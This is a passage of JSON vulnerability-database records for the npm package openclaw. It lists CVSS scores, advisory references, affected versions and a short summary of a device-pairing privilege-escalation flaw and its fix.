/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35618","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35618"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification"},{"reference_url":"https://github.com/advisories/GHSA-j56c-wpqm-h24x","reference_id":"GHSA-j56c-wpqm-h24x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j56c-wpqm-h24x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110761?format=json","purl":"pkg:npm/openclaw@2026.3.23","is_vulnerable":true,"affected_by_vulne
rabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr
-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn
-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw
-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t
-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"}],"aliases":["GHSA-j56c-wpqm-h24x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jtxm-z4vv-cqg7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91709?format=json","vulnerability_id":"VCID-k3up-1vdf-2uh9","summary":"Duplicate Advisory: OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hc5h-pmr3-3497. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a privilege escalation vulnerability in the /pair approve command path that fails to forward caller scopes into the core approval check. 
A caller with pairing privileges but without admin privileges can approve pending device requests asking for broader scopes including admin access by exploiting the missing scope validation in extensions/device-pair/index.ts and src/infra/device-pairing.ts.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33579","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/
MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33579"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval"},{"reference_url":"https://github.com/advisories/GHSA-f275-5h5c-5wg5","reference_id":"GHSA-f275-5h5c-5wg5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f275-5h5c-5wg5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerab
ility":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerab
ility":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerab
ility":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-f275-5h5c-5wg5"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k3up-1vdf-2uh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91677?format=json","vulnerability_id":"VCID-k52b-966p-ybbk","summary":"OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation\n## Summary\n\nThe `/pair approve` command path called device approval without forwarding 
caller scopes into the core approval check.\n\n## Impact\n\nA caller that held pairing privileges but not admin privileges could approve a pending device request asking for broader scopes, including admin access.\n\n## Affected Component\n\n`extensions/device-pair/index.ts, src/infra/device-pairing.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4ee4960de2` (`Pairing: forward caller scopes during approval`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33579","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05112","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05097","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06183","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33579"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4ee4960de2330b5322127f925f3687dc6f105be1","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw